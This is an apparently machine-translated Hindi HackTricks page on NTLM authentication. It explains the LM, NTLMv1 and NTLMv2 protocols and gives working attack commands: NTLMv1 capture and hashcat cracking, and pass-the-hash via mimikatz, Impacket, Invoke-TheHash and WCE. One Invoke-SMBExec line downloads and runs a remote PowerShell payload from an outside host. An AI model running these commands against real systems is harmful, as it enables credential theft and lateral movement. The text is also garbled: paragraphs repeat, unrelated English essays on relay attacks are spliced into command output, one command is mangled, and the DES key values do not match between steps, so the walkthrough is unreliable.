hacktricks/windows-hardening/ntlm
2024-02-09 04:37:44 +00:00
..
atexec.md Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R 2024-02-09 04:37:44 +00:00
places-to-steal-ntlm-creds.md Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R 2024-02-09 04:37:44 +00:00
psexec-and-winexec.md Translated ['forensics/basic-forensic-methodology/README.md', 'forensics 2024-02-09 02:46:55 +00:00
README.md Translated ['forensics/basic-forensic-methodology/README.md', 'forensics 2024-02-09 02:46:55 +00:00
smbexec.md Translated ['forensics/basic-forensic-methodology/README.md', 'forensics 2024-02-09 02:46:55 +00:00
winrm.md Translated ['forensics/basic-forensic-methodology/README.md', 'forensics 2024-02-09 02:46:55 +00:00
wmicexec.md Translated ['forensics/basic-forensic-methodology/README.md', 'forensics 2024-02-09 02:46:55 +00:00

NTLM

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
  • क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आप PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का एक्सेस चाहते हैं? SUBSCRIPTION PLANS की जाँच करें!
  • The PEASS Family की खोज करें, हमारा विशेष NFTs संग्रह।
  • आधिकारिक PEASS & HackTricks swag प्राप्त करें।
  • शामिल हों 💬 Discord समूह](https://discord.gg/hRep4RUj7f) या टेलीग्राम समूह या मुझे Twitter 🐦@carlospolopm** पर फॉलो** करें।
  • अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके hacktricks रेपो और hacktricks-cloud रेपो को

मूल जानकारी

जहां Windows XP और Server 2003 का उपयोग होता है, वहां LM (Lan Manager) हैश का उपयोग किया जाता है, हालांकि यह व्यापक रूप से माना जाता है कि इन्हें आसानी से ध्वस्त किया जा सकता है। विशेष रूप से एक ऐसा LM हैश, AAD3B435B51404EEAAD3B435B51404EE, एक स्थिति को दर्शाता है जहां LM का उपयोग नहीं होता है, जो एक खाली स्ट्रिंग के लिए हैश को प्रतिनिधित्व करता है।

डिफ़ॉल्ट रूप से, Kerberos प्रमाणीकरण प्रोटोकॉल प्रमुख रूप से उपयोग किया जाता है। NTLM (NT LAN Manager) विशेष परिस्थितियों में आता है: Active Directory की अनुपस्थिति, डोमेन की अस्तित्व न होना, Kerberos की गलत विन्यास के कारण काम न करना, या जब कनेक्शन IP पते का उपयोग करके मान्य होस्टनाम की बजाय किया जाता है।

नेटवर्क पैकेट में "NTLMSSP" हेडर की उपस्थिति NTLM प्रमाणीकरण प्रक्रिया की संकेत देती है।

प्रमाणीकरण प्रोटोकॉल - LM, NTLMv1, और NTLMv2 - का समर्थन एक विशिष्ट DLL द्वारा सुविधित है जो %windir%\Windows\System32\msv1\_0.dll पर स्थित है।

मुख्य बिंदु:

  • LM हैश विकल्पशील हैं और एक खाली LM हैश (AAD3B435B51404EEAAD3B435B51404EE) इसके उपयोग की अभाव को दर्शाता है।
  • Kerberos डिफ़ॉल्ट प्रमाणीकरण विधि है, NTLM केवल निश्चित परिस्थितियों में उपयोग किया जाता है।
  • NTLM प्रमाणीकरण पैकेट "NTLMSSP" हेडर द्वारा पहचानी जा सकती है।
  • LM, NTLMv1, और NTLMv2 प्रोटोकॉल सिस्टम फ़ाइल msv1\_0.dll द्वारा समर्थित हैं।

LM, NTLMv1 और NTLMv2

आप जांच और कॉन्फ़िगर कर सकते हैं कि कौन सा प्रोटोकॉल उपयोग किया जाएगा:

GUI

secpol.msc चलाएं -> स्थानीय नीतियाँ -> सुरक्षा विकल्प -> नेटवर्क सुरक्षा: LAN Manager प्रमाणीकरण स्तर। 6 स्तर हैं (0 से 5 तक)।

रजिस्ट्री

यह स्तर 5 सेट करेगा:

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 5 /f

संभावित मान:

0 - Send LM & NTLM responses
1 - Send LM & NTLM responses, use NTLMv2 session security if negotiated
2 - Send NTLM response only
3 - Send NTLMv2 response only
4 - Send NTLMv2 response only, refuse LM
5 - Send NTLMv2 response only, refuse LM & NTLM

बेसिक NTLM डोमेन प्रमाणीकरण योजना

  1. उपयोगकर्ता अपने प्रमाणपत्र प्रस्तुत करता है
  2. क्लाइंट मशीन प्रमाणीकरण अनुरोध भेजती है जिसमें डोमेन नाम और उपयोगकर्ता नाम भेजती है
  3. सर्वर चुनौती भेजता है
  4. क्लाइंट चुनौती को पासवर्ड के हैश का उपयोग करके एन्क्रिप्ट करता है और इसे प्रतिक्रिया के रूप में भेजता है
  5. सर्वर डोमेन कंट्रोलर को डोमेन नाम, उपयोगकर्ता नाम, चुनौती और प्रतिक्रिया भेजता है। यदि सक्रिय निर्देशिका कॉन्फ़िगर नहीं है या डोमेन नाम सर्वर का नाम है, तो प्रमाणपत्र स्थानीय रूप से जांची जाती है
  6. डोमेन कंट्रोलर जांचता है कि सब कुछ सही है और सर्वर को जानकारी भेजता है

सर्वर और डोमेन कंट्रोलर को नेटलॉगन सर्वर के माध्यम से सुरक्षित चैनल बनाने में सक्षम होते हैं क्योंकि डोमेन कंट्रोलर सर्वर के पासवर्ड को जानता है (यह NTDS.DIT डेटाबेस में है)।

स्थानीय NTLM प्रमाणीकरण योजना

प्रमाणीकरण उसी तरह है जैसा पहले उल्लिखित है, लेकिन सर्वर उस उपयोगकर्ता के हैश को जानता है जो प्रमाणीकरण करने की कोशिश कर रहा है सामग्री में। इसलिए, डोमेन कंट्रोलर से पूछने की बजाय, सर्वर खुद जांचेगा कि क्या उपयोगकर्ता प्रमाणीकृत हो सकता है।

NTLMv1 चुनौती

चुनौती लंबाई 8 बाइट है और प्रतिक्रिया 24 बाइट लंबी है।

हैश NT (16 बाइट) को 3 हिस्सों में विभाजित किया जाता है (प्रत्येक 7 बाइट): आखिरी हिस्सा शून्यों से भरा होता है। फिर, चुनौती को प्रत्येक हिस्से के साथ अलग-अलग एन्क्रिप्ट किया जाता है और परिणामी एन्क्रिप्टेड बाइट्स जोड़े जाते हैं। कुल: 8 बाइट + 8 बाइट + 8 बाइट = 24 बाइट।

समस्याएं:

  • अनियमितता की कमी
  • 3 हिस्से अलग-अलग हमले किए जा सकते हैं ताकि NT हैश पता लगाया जा सके
  • DES को तोड़ा जा सकता है
  • 3 वां कुंजी हमेशा 5 शून्यों से मिलकर बनाई जाती है।
  • एक ही चुनौती दिया जाएगा तो प्रतिक्रिया समान होगी। इसलिए, आप पीड़ित को पूर्व-गणना रेनबो तालिकाओं का उपयोग करके प्रतिक्रिया के लिए "1122334455667788" स्ट्रिंग दे सकते हैं और हमला कर सकते हैं।

NTLMv1 हमला

आजकल अनकंशित डेलीगेशन कॉन्फ़िगर किए गए वातावरण पाना कम हो रहा है, लेकिन यह यह नहीं मतलब है कि आप प्रिंट स्पूलर सेवा का दुरुपयोग नहीं कर सकते।

आप AD पर पहले से कुछ प्रमाणपत्र/सत्रों का दुरुपयोग करके प्रिंटर से पूछ सकते हैं कि क्या वह किसी आपके नियंत्रण के अंतर्गत होस्ट के खिलाफ प्रमाणीकरण करें। फिर, metasploit auxiliary/server/capture/smb या responder का उपयोग करके आप प्रमाणीकरण चुनौती को 1122334455667788 सेट कर सकते हैं, प्रमाणीकरण प्रयास को कैप्चर कर सकते हैं, और यदि यह NTLMv1 के उपयोग से किया गया है तो आप इसे तोड़ सकेंगे
यदि आप responder का उपयोग कर रहे हैं तो आप **ध्यान दें कि इस तकनीक के लिए प्रमाणीकरण को NTLMv1 का उपयोग करके किया जाना चाहिए (NTLMv2 मान्य नहीं है)।_

ध्यान रखें कि प्रिंटर प्रमाणीकरण के दौरान कंप्यूटर खाता का उपयोग करेगा, और कंप्यूटर खाते का उपयोग लंबे और यादृच्छिक पासवर्ड करते हैं जिन्हें आप सामान्य शब्दकोश का उपयोग करके तोड़ने के लिए संभावना नहीं होगी। लेकिन NTLMv1 प्रमाणीकरण DES का उपयोग करता है (अधिक जानकारी यहाँ), इसलिए कुछ विशेष रूप से DES को तोड़ने के लिए सेवाओं का उपयोग करके आप इसे तोड़ सकेंगे (आप https://crack.sh/ का उपयोग कर सकते हैं)।

hashcat के साथ NTLMv1 हमला

NTLMv1 को NTLMv1 मल्टी टूल https://github.com/evilmog/ntlmv1-multi के साथ तोड़ा जा सकता है जो NTLMv1 संदेशों को एक ऐसी विधि में स्वरूपित करता है जिसे hashcat के साथ तोड़ा जा सकता है।

आजकल अनकंशित डेलीगेशन कॉन्फ़िगर किए गए वातावरण पाना कम हो रहा है, लेकिन यह यह नहीं मतलब है कि आप प्रिंट स्पूलर सेवा का दुरुपयोग नहीं कर सकते।

आप AD पर पहले से कुछ प्रमाणपत्र/सत्रों का दुरुपयोग करके प्रिंटर से पूछ सकते हैं कि क्या वह किसी आपके नियंत्रण के अंतर्गत होस्ट के खिलाफ प्रमाणीकरण करें। फिर, metasploit auxiliary/server/capture/smb या responder का उपयोग करके आप प्रमाणीकरण चुनौती को 1122334455667788 सेट कर सकते हैं, प्रमाणीकरण प्रयास को कैप्चर कर सकते हैं, और यदि यह NTLMv1 के उपयोग से किया गया है तो आप इसे तोड़ सकेंगे
यदि आप responder का उपयोग कर रहे हैं तो आप **ध्यान दें कि इस तकनीक के लिए प्रमाणीकरण को NTLMv1 का उपयोग करके किया जाना चाहिए (NTLMv2 मान्य नहीं है)।_

python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788

NTLM Relay Attack

Introduction

In an NTLM relay attack, an attacker intercepts an authentication attempt from a victim and relays it to a target server. This allows the attacker to impersonate the victim and gain unauthorized access to the target server.

Steps to Perform NTLM Relay Attack

  1. Capture NTLM Authentication Request: Use tools like Responder or Impacket to capture the NTLM authentication request from the victim.

  2. Relay the Authentication: Relay the captured authentication request to the target server using tools like ntlmrelayx.

  3. Gain Access: Once the authentication is successfully relayed, the attacker can gain access to the target server as the victim.

Mitigation Techniques

  • Enforce SMB Signing: Enabling SMB signing can prevent NTLM relay attacks by ensuring the integrity of SMB packets.

  • Use LDAP Signing: Enabling LDAP signing can also help prevent NTLM relay attacks by securing LDAP communication.

  • Implement Extended Protection for Authentication: This can protect against NTLM relay attacks by adding an extra layer of security to the authentication process.

By implementing these mitigation techniques, organizations can reduce the risk of falling victim to NTLM relay attacks.

['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']

Hostname: DUSTIN-5AA37877
Username: hashcat
Challenge: 1122334455667788
LM Response: 76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D
NT Response: 727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
CT1: 727B4E35F947129E
CT2: A52B9CDEDAE86934
CT3: BB23EF89F50FC595

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

To crack with hashcat create a file with the following contents:
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595

NTLM Relay Attack

Introduction

NTLM relay attacks are a common technique used by attackers to escalate privileges and move laterally within a network. This attack involves intercepting NTLM authentication traffic and relaying it to a target server to gain unauthorized access.

Description

When a user attempts to authenticate to a server using NTLM, the authentication process involves a series of challenges and responses between the client and the server. An attacker can intercept this traffic using tools like Responder or Impacket, and then relay it to another server to impersonate the authenticated user.

Impact

NTLM relay attacks can have serious consequences, allowing attackers to access sensitive information, execute commands, and potentially take over entire systems within a network. This can lead to data breaches, financial losses, and reputational damage for organizations.

Mitigation

To mitigate NTLM relay attacks, it is recommended to implement protections such as:

  • Enabling SMB signing to prevent tampering with authentication traffic
  • Implementing LDAP signing and channel binding
  • Using strong, unique passwords to make relay attacks more difficult
  • Monitoring network traffic for suspicious activity

By taking these steps, organizations can reduce the risk of falling victim to NTLM relay attacks and enhance the security of their networks.

727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

एक उपकरण जैसे hashtopolis के माध्यम से वितरित करना बेहतर है, क्योंकि अन्यथा यह कई दिन ले सकता है।

./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

इस मामले में हमें इसका पासवर्ड पता है कि 'password' है, इसलिए हम डेमो के उद्देश्यों के लिए धोखा देंगे:

python ntlm-to-des.py --ntlm b4b9b02e6f09a9bd760f388b67351e2b
DESKEY1: b55d6d04e67926
DESKEY2: bcba83e6895b9d

echo b55d6d04e67926>>des.cand
echo bcba83e6895b9d>>des.cand

हमें अब hashcat-utilities का उपयोग करना होगा ताकि हम क्रैक किए गए des कुंजी को NTLM हैश के हिस्सों में बदल सकें:

./hashcat-utils/src/deskey_to_ntlm.pl b55d6d05e7792753
b4b9b02e6f09a9 # this is part 1

./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
bd760f388b6700 # this is part 2

अंत में आखिरकार आखिरी भाग:

./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

586c # this is the last part

NTLM

NTLM विस्तार

NTLM एक पुराना प्रमाणीकरण प्रोटोकॉल है जिसे Windows ऑपरेटिंग सिस्टम में प्रयोग किया जाता है। यह एक पासवर्ड हैश का उपयोग करता है जिसे एक चुनौतीपूर्ण प्रक्रिया के रूप में भेजा जाता है।

NTLM की कमजोरियां

NTLM कई सुरक्षा कमजोरियों के कारण अब अविश्वसनीय है। कुछ मुख्य कमजोरियां निम्नलिखित हैं:

  • पासवर्ड की चुराई: NTLM हैश को चुराना साधारण है और इसे ब्रूट फोर्स अटैक के लिए उपयोग किया जा सकता है।
  • एक्टिव डायरेक्टरी परिचालन: NTLM विशेष रूप से एक्टिव डायरेक्टरी परिचालन के लिए अनुकूल नहीं है।
  • एक्सप्लॉइटेशन: NTLM कई एक्सप्लॉइटेशन तकनीकों के लिए उपयुक्त है जो अनुशंसित नहीं हैं।

NTLM को सुरक्षित करना

NTLM को सुरक्षित करने के लिए कुछ उपाय हैं जैसे कि:

  • NTLM का प्रयोग कम करें: NTLM का प्रयोग कम से कम करें और उचित प्रमाणीकरण प्रोटोकॉल्स का उपयोग करें।
  • लॉगिंग और मॉनिटरिंग: NTLM के उपयोग को लॉग और मॉनिटर करें ताकि किसी अनुचित उपयोग की पहचान की जा सके।
  • मलवेयर और एक्सप्लॉइटेशन का नियंत्रण: सुरक्षा उत्पादों का उपयोग करके मलवेयर और एक्सप्लॉइटेशन का नियंत्रण करें।

यह सभी उपायों का समानांतर रूप से प्रयोग करना NTLM को सुरक्षित करने में मदद कर सकता है।

NTHASH=b4b9b02e6f09a9bd760f388b6700586c

NTLMv2 Challenge

चुनौती की लंबाई 8 बाइट है और 2 प्रतिक्रियाएँ भेजी जाती हैं: एक 24 बाइट लंबी है और दूसरी की लंबाई विविध है।

पहली प्रतिक्रिया को HMAC_MD5 का उपयोग करके बनाया जाता है, जिसमें क्लाइंट और डोमेन द्वारा गठित स्ट्रिंग को और कुंजी के रूप में NT हैश का हैश MD4 का उपयोग किया जाता है। फिर, परिणाम को कुंजी के रूप में उपयोग करके HMAC_MD5 का उपयोग करके चुनौती को एन्क्रिप्ट किया जाएगा। इसके लिए, 8 बाइट का एक क्लाइंट चुनौती जोड़ा जाएगा। कुल: 24 बी।

दूसरी प्रतिक्रिया को बनाने के लिए कई मान का उपयोग किया जाता है (एक नया क्लाइंट चुनौती, एक समय-चिह्न को पुनरावृत्ति हमलों से बचाने के लिए...)

यदि आपके पास एक pcap है जिसने एक सफल प्रमाणीकरण प्रक्रिया को कैप्चर किया है, तो आप इस गाइड का पालन करके डोमेन, उपयोगकर्ता नाम, चुनौती और प्रतिक्रिया प्राप्त कर सकते हैं और पासवर्ड को तोड़ने का प्रयास कर सकते हैं: https://research.801labs.org/cracking-an-ntlmv2-hash/

Pass-the-Hash

जब आपके पास पीड़ित का हैश होता है, तो आप इसका उपयोग अनुरूपण करने के लिए कर सकते हैं।
आपको एक उपकरण का उपयोग करना होगा जो उस हैश का उपयोग करके NTLM प्रमाणीकरण करेगा, या आप एक नई सत्रलॉगऑन बना सकते हैं और LSASS में उस हैश को इंजेक्ट कर सकते हैं, ताकि जब भी कोई NTLM प्रमाणीकरण किया जाता है, तो वह हैश उपयोग किया जाएगा। आखिरी विकल्प है जिसे mimikatz करता है।

कृपया ध्यान दें कि आप कंप्यूटर खातों का उपयोग करके भी पास-द-हैश हमले कर सकते हैं।

Mimikatz

व्यवस्थापक के रूप में चलाने की आवश्यकता है

Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'

यह एक प्रक्रिया को शुरू करेगा जो उन उपयोगकर्ताओं के नाम पर होगी जिन्होंने मिमीकैट्ज लॉन्च किया है, लेकिन LSASS में सहेजे गए क्रेडेंशियल्स मिमीकैट्ज पैरामीटर्स के अंदर होंगे। फिर, आप नेटवर्क संसाधनों तक पहुंच सकते हैं जैसे कि आप उस उपयोगकर्ता हो (runas /netonly ट्रिक के समान लेकिन आपको plain-text पासवर्ड पता नहीं होना चाहिए)।

लिनक्स से पास-द-हैश

आप लिनक्स से पास-द-हैश का उपयोग करके Windows मशीनों में कोड निष्पादन प्राप्त कर सकते हैं।
यहाँ क्लिक करें जानने के लिए कैसे करें।

Impacket Windows कॉम्पाइल्ड टूल्स

आप यहाँ से Windows के लिए Impacket बाइनरी डाउनलोड कर सकते हैं

  • psexec_windows.exe C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local
  • wmiexec.exe wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local
  • atexec.exe (इस मामले में आपको एक कमांड निर्दिष्ट करने की आवश्यकता है, cmd.exe और powershell.exe एक इंटरैक्टिव शैली प्राप्त करने के लिए मान्य नहीं हैं) C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'
  • और कई और Impacket बाइनरी हैं...

Invoke-TheHash

आप यहाँ से पावरशेल स्क्रिप्ट प्राप्त कर सकते हैं: https://github.com/Kevin-Robertson/Invoke-TheHash

Invoke-SMBExec

Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose

इन्वोक-डब्ल्यूएमआईइक्जेक्यू

Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose

इनवोक-एसएमबीक्लाइंट

Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose

इनवोक-एसएमबीईनुम

Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose

Invoke-TheHash

यह फ़ंक्शन सभी अन्य का मिश्रण है। आप कई होस्ट को पास कर सकते हैं, किसी को छोड़ सकते हैं और जिस विकल्प का उपयोग करना चाहते हैं उसे चुन सकते हैं (SMBExec, WMIExec, SMBClient, SMBEnum)। अगर आप SMBExec और WMIExec में से किसी भी को चुनते हैं लेकिन आप कोई कमांड पैरामीटर नहीं देते हैं तो यह बस जांचेगा कि क्या आपके पास पर्याप्त अनुमतियाँ हैं।

Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty    h F6F38B793DB6A94BA04A52F1D3EE92F0

ईविल-विनआरएम पास द हैश

Windows Credentials Editor (WCE)

व्यवस्थापक के रूप में चलाया जाना चाहिए

यह उपकरण मिमीकेट्ज (LSASS मेमोरी संशोधित करना) की तरही काम करेगा।

wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>

मैनुअल Windows रिमोट निष्पादन उपयोगकर्ता नाम और पासवर्ड के साथ

{% content-ref url="../lateral-movement/" %} lateral-movement {% endcontent-ref %}

एक Windows होस्ट से क्रेडेंशियल्स निकालना

अधिक जानकारी के लिए कैसे एक Windows होस्ट से क्रेडेंशियल्स प्राप्त करें इस पृष्ठ को पढ़ें.

NTLM रिले और रिस्पॉन्डर

इन हमलों को कैसे करना है, इसके बारे में अधिक विस्तृत गाइड पढ़ें:

{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %} spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md {% endcontent-ref %}

नेटवर्क कैप्चर से NTLM चैलेंज पार्स करें

आप https://github.com/mlgualtieri/NTLMRawUnHide का उपयोग कर सकते हैं

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!